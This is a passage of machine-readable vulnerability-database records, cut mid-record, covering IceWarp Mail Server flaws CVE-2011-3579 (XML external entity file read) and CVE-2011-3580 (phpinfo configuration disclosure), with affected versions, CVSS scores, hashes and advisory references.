"nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3579"], "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-399"], "description": "server/webmail.php in IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to read arbitrary files, and possibly send HTTP requests to intranet servers or cause a denial of service (CPU and memory consumption), via an XML external entity declaration in conjunction with an entity reference.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T11:39:31", "references": [{"idList": ["EDB-ID:36165"], "type": "exploitdb"}, {"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071", "SECURITYVULNS:VULN:11920"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T11:39:31", "wildExploited": false, "wildExploitedSources": []}, "score": {"modified": "2020-10-03T11:39:31", "rev": 2, "value": 5.8, "vector": "NONE"}}, "hash": "d45025c24c4d1fe44cfe43240a77576cdd9e1790a7caa1e6ddaf87b881eedb2c", "hashmap": [{"hash": "8c88ddd69a6143ba0ab41056d05284e3", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "315d7a7b15cda393ce9fffb73645c6c3", "key": "cvss2"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "3cde474b2224e87bfd63c573a9755353", "key": "href"}, {"hash": "873d8334dac92d89e23af0e7431aa456", "key": "cvelist"}, {"hash": "ad748ca54d687532479fdfb825a5f871", "key": "affectedSoftware"}, {"hash": "9b257ef804cfe63c30c04ab15f4e91cd", "key": "cvss"}, {"hash": "86bba9f2ca4a7fd1c9e14dc44bf74c08", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "1c0be0631b7bf4c3a8c83298e68c99eb", "key": "cwe"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "b7db5d3270b65057ac35eed580d4c1fd", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3579", "id": "CVE-2011-3579", "lastseen": "2020-10-03T11:39:31", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://www.osvdb.org/75721", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3579", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T11:39:31"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "ad748ca54d687532479fdfb825a5f871"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "cd349445e80e8b2179f25196bdaf10dc"}, {"key": "cpe23", "hash": "c5f73a003796a1ee2c10cd02ae7d86b2"}, {"key": "cpeConfiguration", "hash": "a8d0987ef59bbb82609435f1e9c14370"}, {"key": "cvelist", "hash": "873d8334dac92d89e23af0e7431aa456"}, {"key": "cvss", "hash": "9b257ef804cfe63c30c04ab15f4e91cd"}, {"key": "cvss2", "hash": "315d7a7b15cda393ce9fffb73645c6c3"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "1c0be0631b7bf4c3a8c83298e68c99eb"}, {"key": "description", "hash": "8c88ddd69a6143ba0ab41056d05284e3"}, {"key": "extraReferences", "hash": "ca496f4d15cd17b520751f0eae5489e8"}, {"key": "href", "hash": "3cde474b2224e87bfd63c573a9755353"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "79f130ef461e5fcadeacc002df89c60a"}, {"key": "published", "hash": "07d3f7b2955caa3b6538d5a344d51a1d"}, {"key": "references", "hash": "b7db5d3270b65057ac35eed580d4c1fd"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "86bba9f2ca4a7fd1c9e14dc44bf74c08"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "83d336f262dc8881c3adefe32a32e1e03ae51673be2342865ff5002f4b91c5e1", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:36165"]}, {"type": "openvas", "idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105320"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11920", "SECURITYVULNS:DOC:27071"]}], "modified": "2021-04-22T23:19:42", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-04-22T23:19:42", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "10.3.2"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cwe": ["CWE-399"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "49753", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/49753"}, {"name": "icewarpwebmail-xml-info-disclosure(70025)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/70025"}, {"name": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "refsource": "MISC", "tags": ["Exploit"], "url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt"}, {"name": "1026093", "refsource": "SECTRACK", "tags": [], "url": "http://securitytracker.com/id?1026093"}, {"name": "8404", "refsource": "SREASON", "tags": [], "url": "http://securityreason.com/securityalert/8404"}, {"name": "75721", "refsource": "OSVDB", "tags": [], "url": "http://www.osvdb.org/75721"}, {"name": "20110923 TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server", "refsource": "BUGTRAQ", "tags": ["Exploit"], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html"}], "immutableFields": []}, {"id": "CVE-2011-3580", "bulletinFamily": "NVD", "title": "CVE-2011-3580", "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "published": "2011-09-30T17:55:00", "modified": "2017-08-29T01:30:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "reporter": "cve@mitre.org", "references": ["http://www.securityfocus.com/bid/49753", "http://www.osvdb.org/75722", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "cvelist": ["CVE-2011-3580"], "type": "cve", "lastseen": "2021-04-22T23:19:42", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.7"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.8"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.0"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.3.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.1"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.2.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.4.2"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "le", "version": "*"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.0.4"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "10.1.3"}, {"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", "version": "9.3.2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:mail_server:10.1.1", "cpe:/a:icewarp:mail_server:10.3.0", "cpe:/a:icewarp:mail_server:9.4.1", "cpe:/a:icewarp:mail_server:10.2.0", "cpe:/a:icewarp:mail_server:10.3.2", "cpe:/a:icewarp:mail_server:10.3.1", "cpe:/a:icewarp:mail_server:9.3.2", "cpe:/a:icewarp:mail_server:10.1.2", "cpe:/a:icewarp:mail_server:10.0.8", "cpe:/a:icewarp:mail_server:9.3.1", "cpe:/a:icewarp:mail_server:10.0.4", "cpe:/a:icewarp:mail_server:10.2.1", "cpe:/a:icewarp:mail_server:10.1.4", "cpe:/a:icewarp:mail_server:10.2.2", "cpe:/a:icewarp:mail_server:10.0.3", "cpe:/a:icewarp:mail_server:9.4.0", "cpe:/a:icewarp:mail_server:9.4.2", "cpe:/a:icewarp:mail_server:10.1.3", "cpe:/a:icewarp:mail_server:10.0.7", "cpe:/a:icewarp:mail_server:9.3.0"], "cpe23": ["cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.8:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.4.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.7:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.2:*:*:*:*:*:*:*", "versionEndIncluding": "10.3.2", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.3.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.0.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.1.4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:9.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:icewarp:mail_server:10.2.1:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-3580"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-200"], "description": "IceWarp WebMail in IceWarp Mail Server before 10.3.3 allows remote attackers to obtain configuration information via a direct request to the /server URI, which triggers a call to the phpinfo function.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-11-29T23:05:22", "references": [{"idList": ["OPENVAS:103279", "OPENVAS:1361412562310103279", "OPENVAS:1361412562310902478"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27071"], "type": "securityvulns"}, {"idList": ["PACKETSTORM:105320"], "type": "packetstorm"}], "rev": 2}, "score": {"modified": "2020-11-29T23:05:22", "rev": 2, "value": 6.0, "vector": "NONE"}}, "hash": "b9b3360421ff62667504b6e8768a7867d34a57e4195fee52e98333a9b39e7a7f", "hashmap": [{"hash": "fd491ff95fc43c201d07e4cada6dc489", "key": "description"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "8372bab5a2b07ce8c58960126bc7fa81", "key": "cpeConfiguration"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "cd349445e80e8b2179f25196bdaf10dc", "key": "cpe"}, {"hash": "c6801e140f45bd3e98a3d0c9b533987e", "key": "affectedSoftware"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "c5f73a003796a1ee2c10cd02ae7d86b2", "key": "cpe23"}, {"hash": "be7a08449a34556fa4ea0840b564e7f3", "key": "cvelist"}, {"hash": "07d3f7b2955caa3b6538d5a344d51a1d", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5da245d7cfd34f4916f532f2437ed3a8", "key": "title"}, {"hash": "ac9a8cc07be6deac41aed2625ae4cc32", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "d3facac8ad40d6b5e1e035dbb0fcdceb", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3580", "id": "CVE-2011-3580", "lastseen": "2020-11-29T23:05:22", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-09-30T17:55:00", "references": ["http://www.securityfocus.com/bid/49753", "http://www.osvdb.org/75722", "https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70026", "http://archives.neohapsis.com/archives/bugtraq/2011-09/0145.html", "http://securitytracker.com/id?1026093", "http://securityreason.com/securityalert/8404"], "reporter": "cve@mitre.org", "title": "CVE-2011-3580", "type": "cve", "viewCount": 3}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-29T23:05:22"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "icewarp:mail_server", "name": "icewarp mail server", "operator": "eq", 